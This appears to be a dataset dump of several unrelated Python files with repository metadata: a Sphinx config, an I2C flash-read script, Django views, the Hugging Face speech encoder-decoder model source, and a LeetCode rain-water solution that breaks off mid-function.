# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'saharaoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'Sahara.tex', u'OpenStack Data Processing API Documentation',
u'OpenStack Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_use_modindex = True
| [
"Wayne [email protected]"
] | Wayne [email protected] |
210609fb82f3bd44f14c0dc789314dd099ea2a0f | 08c132bc63ebba2edebde139f7907953ae2fa04d | /Archived_Files/FTDI_Python_Libraries - SPI_MDIO_I2C/etc_i2c_flash.py | 5dc8f62ab699ff7816ef920fa89870c54f41af85 | [] | no_license | hudkmr/Code_Database | 12b60d1b331b91e9dc990d63bd4603bb92d0bfe7 | d80751c13bd30114af70d690ef8fc1a0d6368490 | refs/heads/master | 2021-01-21T12:49:47.564408 | 2015-07-30T02:28:07 | 2015-07-30T02:28:07 | 39,899,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | #This Script Reads the Data from I2C Slave device(Flash memory) using FTDI MPSSE Engine
from etc_abb_i2c_lib import BB_I2C
from etc_abb_i2c_lib.etc_header import *
import sys
import time
d=BB_I2C(0)
d.DevConf(BAUD,DO_MASK_VAL,SYNC_MODE)
TXACKBuf=[]
RXACKBuf=[]
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0x80,0)
TXACKBuf+=d.SendByte('00')
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0x80,1)
RXACKBuf+=d.ReadByteAK()
RXACKBuf+=d.ReadByteNAK()
d.I2CStop_CMD()
print RXACKBuf
'''
data = ['1','2','3','4','5','6','7','8']
TXACKBuf=[]
RXACKBuf=[]
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0xA6,0)
TXACKBuf+=d.SendByte(0x10)
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0xA6,1)
for i in range(7):
RXACKBuf+=d.ReadByteAK()
RXACKBuf+=d.ReadByteNAK()
d.I2CStop_CMD()
print RXACKBuf
'''
| [
"[email protected]"
] | |
110e68626a3a41241542e46200b9b2518c135ea3 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/149/40381/submittedfiles/testes.py | ea7b0089a5a041e237f02731936156abd74a1461 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | # -*- coding: utf-8 -*-
import math
i=int(input('digite i:'))
while i<10:
print(i)
i=i+1
| [
"[email protected]"
] | |
117aa18bc9ed57ce6572e9120224d114fc632a6e | 32e2e9ecd12d4eeaacc64d1a699672633501ea08 | /find_a_midwife/views.py | 142206c710eac207c0818e7371cb179f8e186912 | [] | no_license | BrianC68/wr_maternity | 365098abb13d255348d2d57bf1c543cd698e6ae8 | 5392fdead32c5f79c7be9a4cb0397df26a5de915 | refs/heads/master | 2023-01-24T08:42:06.965179 | 2023-01-20T17:42:44 | 2023-01-20T17:42:44 | 233,097,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import ListView, DetailView
from .models import Midwife
class MidwifeListView(ListView):
'''Page that displays all midwives.'''
template_name = 'midwife_list_view.html'
model = Midwife
context_object_name = 'midwives'
def get_queryset(self):
queryset = super().get_queryset().only('name', 'service_area', 'photo')
return queryset
class MidwifeDetailView(DetailView):
'''Page that displays individual doula details.'''
template_name = 'midwife_detail_view.html'
model = Midwife
context_object_name = 'midwife'
| [
"[email protected]"
] | |
e3a979129f8e489822a61a1c0972a4cfd9305ecc | cad9d8b930fdd0998899c2ead23f7688769e0348 | /src/transformers/models/speech_encoder_decoder/modeling_speech_encoder_decoder.py | 45262ad940fe336ba84de724b25ee7e84f255647 | [
"Apache-2.0"
] | permissive | bage79/transformers | 2687ad7556e6dc10a7dc65d64c2696a837fce9ce | 867f3950fa908632ddb3564873293b620d73c2dc | refs/heads/main | 2022-06-13T08:20:33.887880 | 2022-03-25T13:12:23 | 2022-03-25T13:12:23 | 213,647,037 | 1 | 0 | Apache-2.0 | 2019-10-08T13:18:55 | 2019-10-08T13:18:54 | null | UTF-8 | Python | false | false | 32,331 | py | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Classes to support Speech-Encoder-Text-Decoder architectures"""
from typing import Optional
import torch
from torch import nn
from torch.nn import CrossEntropyLoss
from ...configuration_utils import PretrainedConfig
from ...modeling_outputs import Seq2SeqLMOutput
from ...modeling_utils import PreTrainedModel
from ...utils import add_start_docstrings, add_start_docstrings_to_model_forward, logging, replace_return_docstrings
from ..auto.configuration_auto import AutoConfig
from ..auto.modeling_auto import AutoModel, AutoModelForCausalLM
from .configuration_speech_encoder_decoder import SpeechEncoderDecoderConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "SpeechEncoderDecoderConfig"
SPEECH_ENCODER_DECODER_START_DOCSTRING = r"""
This class can be used to initialize a speech-sequence-to-text-sequence model with any pretrained speech
autoencoding model as the encoder and any pretrained text autoregressive model as the decoder. The encoder is
loaded via [`~AutoModel.from_pretrained`] function and the decoder is loaded via
[`~AutoModelForCausalLM.from_pretrained`] function. Cross-attention layers are automatically added to the decoder
and should be fine-tuned on a downstream generative task, like summarization.
The effectiveness of initializing sequence-to-sequence models with pretrained checkpoints for sequence generation
tasks was shown in [Leveraging Pre-trained Checkpoints for Sequence Generation
Tasks](https://arxiv.org/abs/1907.12461) by Sascha Rothe, Shashi Narayan, Aliaksei Severyn. Michael Matena, Yanqi
Zhou, Wei Li, Peter J. Liu.
Additionally, in [Large-Scale Self- and Semi-Supervised Learning for Speech
Translation](https://arxiv.org/abs/2104.06678) it is shown how leveraging large pretrained speech models for speech
translation yields a significant performance improvement.
After such an Speech-Encoder Decoder model has been trained/fine-tuned, it can be saved/loaded just like any other
models (see the examples for more information).
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`SpeechEncoderDecoderConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
SPEECH_ENCODER_DECODER_INPUTS_DOCSTRING = r"""
Args:
inputs (`torch.FloatTensor` of shape `(batch_size, sequence_length)` or `(batch_size, sequence_length, feature_dim)`, *optional*):
Float values of input raw speech waveform or speech features. Values can be obtained by loading a *.flac*
or *.wav* audio file into an array of type *List[float]* or a *numpy.ndarray*, *e.g.* via the soundfile
library (*pip install soundfile*). To prepare the array into *inputs*, either the [`Wav2Vec2Processor`] or
[`Speech2TextProcessor`] should be used for padding and conversion into a tensor of type
*torch.FloatTensor*.
attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
decoder_input_ids (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*):
Indices of decoder input sequence tokens in the vocabulary.
Indices can be obtained using [`PreTrainedTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
If `past_key_values` is used, optionally only the last `decoder_input_ids` have to be input (see
`past_key_values`).
For training, `decoder_input_ids` are automatically created by the model by shifting the `labels` to the
right, replacing -100 by the `pad_token_id` and prepending them with the `decoder_start_token_id`.
decoder_attention_mask (`torch.BoolTensor` of shape `(batch_size, target_sequence_length)`, *optional*):
Default behavior: generate a tensor that ignores pad tokens in `decoder_input_ids`. Causal mask will also
be used by default.
encoder_outputs (`tuple(torch.FloatTensor)`, *optional*):
This tuple must consist of (`last_hidden_state`, *optional*: `hidden_states`, *optional*: `attentions`)
`last_hidden_state` (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`) is a tensor
of hidden-states at the output of the last layer of the encoder. Used in the cross-attention of the
decoder.
past_key_values (`tuple(tuple(torch.FloatTensor))` of length `config.n_layers` with each tuple having 4 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
`decoder_input_ids` of shape `(batch_size, sequence_length)`.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
decoder_inputs_embeds (`torch.FloatTensor` of shape `(batch_size, target_sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `decoder_input_ids` you can choose to directly pass an embedded
representation. This is useful if you want more control over how to convert `decoder_input_ids` indices
into associated vectors than the model's internal embedding lookup matrix.
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the masked language modeling loss for the decoder. Indices should be in `[-100, 0,
..., config.vocab_size]` (see `input_ids` docstring) Tokens with indices set to `-100` are ignored
(masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`
use_cache (`bool`, *optional*):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
`past_key_values`).
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
input_values (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Float values of input raw speech waveform. Values can be obtained by loading a *.flac* or *.wav* audio file
into an array of type *List[float]* or a *numpy.ndarray*, *e.g.* via the soundfile library (*pip install
soundfile*). To prepare the array into *input_values*, the [`Wav2Vec2Processor`] should be used for padding
and conversion into a tensor of type *torch.FloatTensor*. See [`Wav2Vec2Processor.__call__`] for details.
input_features (`torch.LongTensor` of shape `(batch_size, sequence_length, feature_size)`, *optional*):
Float values of fbank features extracted from the raw speech waveform. Raw speech waveform can be obtained
by loading a `.flac` or `.wav` audio file into an array of type `List[float]` or a `numpy.ndarray`, *e.g.*
via the soundfile library (`pip install soundfile`). To prepare the array into `input_features`, the
[`Speech2TextTokenizer`] should be used for extracting the fbank features, padding and conversion into a
tensor of type `torch.FloatTensor`. See [`~Speech2TextTokenizer.__call__`]
return_dict (`bool`, *optional*):
If set to `True`, the model will return a [`~utils.Seq2SeqLMOutput`] instead of a plain tuple.
kwargs: (*optional*) Remaining dictionary of keyword arguments. Keyword arguments come in two flavors:
- Without a prefix which will be input as `**encoder_kwargs` for the encoder forward function.
- With a *decoder_* prefix which will be input as `**decoder_kwargs` for the decoder forward function.
"""
# Copied from transformers.models.encoder_decoder.modeling_encoder_decoder.shift_tokens_right
def shift_tokens_right(input_ids: torch.Tensor, pad_token_id: int, decoder_start_token_id: int):
"""
Shift input ids one token to the right.
"""
shifted_input_ids = input_ids.new_zeros(input_ids.shape)
shifted_input_ids[:, 1:] = input_ids[:, :-1].clone()
if decoder_start_token_id is None:
raise ValueError("Make sure to set the decoder_start_token_id attribute of the model's configuration.")
shifted_input_ids[:, 0] = decoder_start_token_id
if pad_token_id is None:
raise ValueError("Make sure to set the pad_token_id attribute of the model's configuration.")
# replace possible -100 values in labels by `pad_token_id`
shifted_input_ids.masked_fill_(shifted_input_ids == -100, pad_token_id)
return shifted_input_ids
@add_start_docstrings(SPEECH_ENCODER_DECODER_START_DOCSTRING)
class SpeechEncoderDecoderModel(PreTrainedModel):
r"""
[`SpeechEncoderDecoderModel`] is a generic model class that will be instantiated as a transformer architecture with
one of the base model classes of the library as encoder and another one as decoder when created with the
:meth*~transformers.AutoModel.from_pretrained* class method for the encoder and
:meth*~transformers.AutoModelForCausalLM.from_pretrained* class method for the decoder.
"""
config_class = SpeechEncoderDecoderConfig
base_model_prefix = "speech_encoder_decoder"
main_input_name = "inputs"
supports_gradient_checkpointing = True
def __init__(
self,
config: Optional[PretrainedConfig] = None,
encoder: Optional[PreTrainedModel] = None,
decoder: Optional[PreTrainedModel] = None,
):
if config is None and (encoder is None or decoder is None):
raise ValueError("Either a configuration or an encoder and a decoder has to be provided.")
if config is None:
config = SpeechEncoderDecoderConfig.from_encoder_decoder_configs(encoder.config, decoder.config)
else:
if not isinstance(config, self.config_class):
raise ValueError(f"Config: {config} has to be of type {self.config_class}")
if config.decoder.cross_attention_hidden_size is not None:
if config.decoder.cross_attention_hidden_size != config.encoder.hidden_size:
raise ValueError(
"If `cross_attention_hidden_size` is specified in the decoder's configuration, "
"it has to be equal to the encoder's `hidden_size`. "
f"Got {config.decoder.cross_attention_hidden_size} for `config.decoder.cross_attention_hidden_size` "
f"and {config.encoder.hidden_size} for `config.encoder.hidden_size`."
)
# initialize with config
# make sure input & output embeddings is not tied
config.tie_word_embeddings = False
super().__init__(config)
if encoder is None:
encoder = AutoModel.from_config(config.encoder)
if decoder is None:
decoder = AutoModelForCausalLM.from_config(config.decoder)
self.encoder = encoder
self.decoder = decoder
if self.encoder.config.to_dict() != self.config.encoder.to_dict():
logger.warning(
f"Config of the encoder: {self.encoder.__class__} is overwritten by shared encoder config: {self.config.encoder}"
)
if self.decoder.config.to_dict() != self.config.decoder.to_dict():
logger.warning(
f"Config of the decoder: {self.decoder.__class__} is overwritten by shared decoder config: {self.config.decoder}"
)
# make sure that the individual model's config refers to the shared config
# so that the updates to the config will be synced
self.encoder.config = self.config.encoder
self.decoder.config = self.config.decoder
# get encoder output hidden size
self.encoder_output_dim = getattr(config.encoder, "output_hidden_size", config.encoder.hidden_size)
if (
self.encoder_output_dim != self.decoder.config.hidden_size
and self.decoder.config.cross_attention_hidden_size is None
):
# encoder outputs might need to be projected to different dimension for decoder
self.enc_to_dec_proj = nn.Linear(self.encoder.config.hidden_size, self.decoder.config.hidden_size)
if self.encoder.get_output_embeddings() is not None:
raise ValueError(
f"The encoder {self.encoder} should not have a LM Head. Please use a model without LM Head"
)
def _set_gradient_checkpointing(self, module, value=False):
# call both encoder and decoder function on gradient checkpointing
self.encoder._set_gradient_checkpointing(module, value=value)
self.decoder._set_gradient_checkpointing(module, value=value)
def get_encoder(self):
return self.encoder
def get_decoder(self):
return self.decoder
def get_output_embeddings(self):
return self.decoder.get_output_embeddings()
def set_output_embeddings(self, new_embeddings):
return self.decoder.set_output_embeddings(new_embeddings)
def freeze_feature_encoder(self):
"""
Calling this function will disable the gradient computation for the feature encoder of the speech encoder so
that its parameters will not be updated during training.
"""
self.encoder.freeze_feature_encoder()
@classmethod
def from_pretrained(cls, *args, **kwargs):
# At the moment fast initialization is not supported for composite models
if kwargs.get("_fast_init", False):
logger.warning(
"Fast initialization is currently not supported for SpeechEncoderDecoderModel. "
"Falling back to slow initialization..."
)
kwargs["_fast_init"] = False
return super().from_pretrained(*args, **kwargs)
@classmethod
def from_encoder_decoder_pretrained(
cls,
encoder_pretrained_model_name_or_path: str = None,
decoder_pretrained_model_name_or_path: str = None,
*model_args,
**kwargs
) -> PreTrainedModel:
r"""
Instantiate an encoder and a decoder from one or two base classes of the library from pretrained model
checkpoints.
The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated). To train
the model, you need to first set it back in training mode with `model.train()`.
Params:
encoder_pretrained_model_name_or_path (`str`, *optional*):
Information necessary to initiate the encoder. Can be either:
- A string, the *model id* of a pretrained model hosted inside a model repo on huggingface.co.
Valid model ids can be located at the root-level, like `bert-base-uncased`, or namespaced under a
user or organization name, like `dbmdz/bert-base-german-cased`.
- A path to a *directory* containing model weights saved using
[`~PreTrainedModel.save_pretrained`], e.g., `./my_model_directory/`.
- A path or url to a *tensorflow index checkpoint file* (e.g, `./tf_model/model.ckpt.index`). In
this case, `from_tf` should be set to `True` and a configuration object should be provided as
`config` argument. This loading path is slower than converting the TensorFlow checkpoint in a
PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.
decoder_pretrained_model_name_or_path (`str`, *optional*, defaults to `None`):
Information necessary to initiate the decoder. Can be either:
- A string, the *model id* of a pretrained model hosted inside a model repo on huggingface.co.
Valid model ids can be located at the root-level, like `bert-base-uncased`, or namespaced under a
user or organization name, like `dbmdz/bert-base-german-cased`.
- A path to a *directory* containing model weights saved using
[`~PreTrainedModel.save_pretrained`], e.g., `./my_model_directory/`.
- A path or url to a *tensorflow index checkpoint file* (e.g, `./tf_model/model.ckpt.index`). In
this case, `from_tf` should be set to `True` and a configuration object should be provided as
`config` argument. This loading path is slower than converting the TensorFlow checkpoint in a
PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.
model_args (remaining positional arguments, *optional*):
All remaning positional arguments will be passed to the underlying model's `__init__` method.
kwargs (remaining dictionary of keyword arguments, *optional*):
Can be used to update the configuration object (after it being loaded) and initiate the model (e.g.,
`output_attentions=True`).
- To update the encoder configuration, use the prefix *encoder_* for each configuration parameter.
- To update the decoder configuration, use the prefix *decoder_* for each configuration parameter.
- To update the parent model configuration, do not use a prefix for each configuration parameter.
Behaves differently depending on whether a `config` is provided or automatically loaded.
Example:
```python
>>> from transformers import SpeechEncoderDecoderModel
>>> # initialize a wav2vec2bert from a pretrained Wav2Vec2 and a pretrained BERT model. Note that the cross-attention layers will be randomly initialized
>>> model = SpeechEncoderDecoderModel.from_encoder_decoder_pretrained(
... "facebook/wav2vec2-base-960h", "bert-base-uncased"
... )
>>> # saving model after fine-tuning
>>> model.save_pretrained("./wav2vec2bert")
>>> # load fine-tuned model
>>> model = SpeechEncoderDecoderModel.from_pretrained("./wav2vec2bert")
```"""
kwargs_encoder = {
argument[len("encoder_") :]: value for argument, value in kwargs.items() if argument.startswith("encoder_")
}
kwargs_decoder = {
argument[len("decoder_") :]: value for argument, value in kwargs.items() if argument.startswith("decoder_")
}
# remove encoder, decoder kwargs from kwargs
for key in kwargs_encoder.keys():
del kwargs["encoder_" + key]
for key in kwargs_decoder.keys():
del kwargs["decoder_" + key]
# Load and initialize the encoder and decoder
# The distinction between encoder and decoder at the model level is made
# by the value of the flag `is_decoder` that we need to set correctly.
encoder = kwargs_encoder.pop("model", None)
if encoder is None:
if encoder_pretrained_model_name_or_path is None:
raise ValueError(
"If `encoder_model` is not defined as an argument, a `encoder_pretrained_model_name_or_path` has "
"to be defined."
)
if "config" not in kwargs_encoder:
encoder_config, kwargs_encoder = AutoConfig.from_pretrained(
encoder_pretrained_model_name_or_path, **kwargs_encoder, return_unused_kwargs=True
)
if encoder_config.is_decoder is True or encoder_config.add_cross_attention is True:
logger.info(
f"Initializing {encoder_pretrained_model_name_or_path} as a encoder model "
"from a decoder model. Cross-attention and casual mask are disabled."
)
encoder_config.is_decoder = False
encoder_config.add_cross_attention = False
kwargs_encoder["config"] = encoder_config
encoder = AutoModel.from_pretrained(encoder_pretrained_model_name_or_path, *model_args, **kwargs_encoder)
decoder = kwargs_decoder.pop("model", None)
if decoder is None:
if decoder_pretrained_model_name_or_path is None:
raise ValueError(
"If `decoder_model` is not defined as an argument, a `decoder_pretrained_model_name_or_path` has "
"to be defined."
)
if "config" not in kwargs_decoder:
decoder_config, kwargs_decoder = AutoConfig.from_pretrained(
decoder_pretrained_model_name_or_path, **kwargs_decoder, return_unused_kwargs=True
)
if decoder_config.is_decoder is False or decoder_config.add_cross_attention is False:
logger.info(
f"Initializing {decoder_pretrained_model_name_or_path} as a decoder model. "
f"Cross attention layers are added to {decoder_pretrained_model_name_or_path} "
f"and randomly initialized if {decoder_pretrained_model_name_or_path}'s architecture allows for "
"cross attention layers."
)
decoder_config.is_decoder = True
decoder_config.add_cross_attention = True
kwargs_decoder["config"] = decoder_config
if kwargs_decoder["config"].is_decoder is False or kwargs_decoder["config"].add_cross_attention is False:
logger.warning(
f"Decoder model {decoder_pretrained_model_name_or_path} is not initialized as a decoder. "
f"In order to initialize {decoder_pretrained_model_name_or_path} as a decoder, "
"make sure that the attributes `is_decoder` and `add_cross_attention` of `decoder_config` "
"passed to `.from_encoder_decoder_pretrained(...)` are set to `True` or do not pass a "
"`decoder_config` to `.from_encoder_decoder_pretrained(...)`"
)
decoder = AutoModelForCausalLM.from_pretrained(decoder_pretrained_model_name_or_path, **kwargs_decoder)
# instantiate config with corresponding kwargs
config = SpeechEncoderDecoderConfig.from_encoder_decoder_configs(encoder.config, decoder.config, **kwargs)
# make sure input & output embeddings is not tied
config.tie_word_embeddings = False
return cls(encoder=encoder, decoder=decoder, config=config)
@add_start_docstrings_to_model_forward(SPEECH_ENCODER_DECODER_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=Seq2SeqLMOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
inputs=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
encoder_outputs=None,
past_key_values=None,
decoder_inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
input_values=None,
input_features=None,
return_dict=None,
**kwargs,
):
r"""
Returns:
Examples:
```python
>>> from transformers import SpeechEncoderDecoderModel, Wav2Vec2Processor
>>> from datasets import load_dataset
>>> import torch
>>> processor = Wav2Vec2Processor.from_pretrained("facebook/wav2vec2-xls-r-300m-en-to-15")
>>> model = SpeechEncoderDecoderModel.from_pretrained("facebook/wav2vec2-xls-r-300m-en-to-15")
>>> ds = load_dataset("hf-internal-testing/librispeech_asr_dummy", "clean", split="validation")
>>> input_values = processor(ds[0]["audio"]["array"], return_tensors="pt").input_values
>>> # Inference: Translate English speech to German
>>> generated = model.generate(input_values)
>>> decoded = processor.batch_decode(generated, skip_special_tokens=True)[0]
>>> decoded
'Mr. Quilter ist der Apostel der Mittelschicht und wir freuen uns, sein Evangelium willkommen heißen zu können.'
>>> # Training: Train model on English transcription
>>> with processor.as_target_processor():
... labels = processor(ds[0]["text"], return_tensors="pt").input_ids
>>> loss = model(input_values, labels=labels).loss
>>> loss.backward()
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
kwargs_encoder = {argument: value for argument, value in kwargs.items() if not argument.startswith("decoder_")}
kwargs_decoder = {
argument[len("decoder_") :]: value for argument, value in kwargs.items() if argument.startswith("decoder_")
}
if encoder_outputs is None:
if inputs is None:
if input_values is not None and input_features is not None:
raise ValueError("You cannot specify both input_values and input_features at the same time")
elif input_values is not None:
inputs = input_values
elif input_features is not None:
inputs = input_features
else:
raise ValueError("You have to specify either input_values or input_features")
encoder_outputs = self.encoder(
inputs,
attention_mask=attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
**kwargs_encoder,
)
encoder_hidden_states = encoder_outputs[0]
# optionally project encoder_hidden_states
if (
self.encoder_output_dim != self.decoder.config.hidden_size
and self.decoder.config.cross_attention_hidden_size is None
):
encoder_hidden_states = self.enc_to_dec_proj(encoder_hidden_states)
# compute correct encoder attention mask
if attention_mask is not None:
encoder_attention_mask = self.encoder._get_feature_vector_attention_mask(
encoder_hidden_states.shape[1], attention_mask
)
else:
encoder_attention_mask = None
if (labels is not None) and (decoder_input_ids is None and decoder_inputs_embeds is None):
decoder_input_ids = shift_tokens_right(
labels, self.config.pad_token_id, self.config.decoder_start_token_id
)
# Decode
decoder_outputs = self.decoder(
input_ids=decoder_input_ids,
attention_mask=decoder_attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
inputs_embeds=decoder_inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
use_cache=use_cache,
past_key_values=past_key_values,
return_dict=return_dict,
**kwargs_decoder,
)
# Compute loss independent from decoder (as some shift the logits inside them)
loss = None
if labels is not None:
logits = decoder_outputs.logits if return_dict else decoder_outputs[0]
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.reshape(-1, self.decoder.config.vocab_size), labels.view(-1))
if not return_dict:
if loss is not None:
return (loss,) + decoder_outputs + encoder_outputs
else:
return decoder_outputs + encoder_outputs
return Seq2SeqLMOutput(
loss=loss,
logits=decoder_outputs.logits,
past_key_values=decoder_outputs.past_key_values,
decoder_hidden_states=decoder_outputs.hidden_states,
decoder_attentions=decoder_outputs.attentions,
cross_attentions=decoder_outputs.cross_attentions,
encoder_last_hidden_state=encoder_outputs.last_hidden_state,
encoder_hidden_states=encoder_outputs.hidden_states,
encoder_attentions=encoder_outputs.attentions,
)
def prepare_decoder_input_ids_from_labels(self, labels: torch.Tensor):
return shift_tokens_right(labels, self.config.pad_token_id, self.config.decoder_start_token_id)
def prepare_inputs_for_generation(
self, input_ids, past=None, attention_mask=None, use_cache=None, encoder_outputs=None, **kwargs
):
decoder_inputs = self.decoder.prepare_inputs_for_generation(input_ids, past=past)
decoder_attention_mask = decoder_inputs["attention_mask"] if "attention_mask" in decoder_inputs else None
input_dict = {
"attention_mask": attention_mask,
"decoder_attention_mask": decoder_attention_mask,
"decoder_input_ids": decoder_inputs["input_ids"],
"encoder_outputs": encoder_outputs,
"past_key_values": decoder_inputs["past_key_values"],
"use_cache": use_cache,
}
return input_dict
def resize_token_embeddings(self, *args, **kwargs):
raise NotImplementedError(
"Resizing the embedding layers via the SpeechEncoderDecoderModel directly is not supported. "
"Please use the respective methods of the wrapped decoder object (model.decoder.resize_token_embeddings(...))"
)
def _reorder_cache(self, past, beam_idx):
# apply decoder cache reordering here
return self.decoder._reorder_cache(past, beam_idx)
| [
"[email protected]"
] | |
a8be8bddddc67ab30f266259012c32c14fe1bede | ce18cf6bdb1a85a65a509597b4c0ec046b855186 | /2021年4月/接雨水.py | e3b2d4f6b80d4cf594dc6bc3a4110f902cfdb9c8 | [] | no_license | elssm/leetcode | e12e39faff1da5afb234be08e7d9db85fbee58f8 | a38103d2d93b34bc8bcf09f87c7ea698f99c4e36 | refs/heads/master | 2021-06-11T06:44:44.993905 | 2021-04-28T06:14:23 | 2021-04-28T06:14:23 | 171,072,054 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,415 | py | class Solution(object):
def trap(self, height):
"""
:type height: List[int]
:rtype: int
"""
if len(height) <= 1:
return 0
#两层循环时间复杂度太大了。不过思路没问题
# ans=0
# start=0
# end=0
# max_h = max(height)
# for i in range(1,max_h+1):
# for j in range(len(height)):
# if height[j]>=i:
# start=j
# break
# for k in range(len(height)):
# if height[len(height)-k-1]>=i:
# end=len(height)-k-1
# break
# for j in range(start+1,end):
# if height[j]<i:
# ans+=1
# return ans
#找到最大值
max_h = max(height)
#找到最大值的下标(第一个最大值)
index = height.index(max_h)
ans=0
temp=0
#从左到最大值遍历
for i in range(index):
if height[i]<height[temp]:
ans=ans+(height[temp]-height[i])
else:
temp=i
height=list(reversed(height[index:]))
temp2=0
for i in range(len(height)):
if height[i]<height[temp2]:
ans=ans+(height[temp2]-height[i])
else:
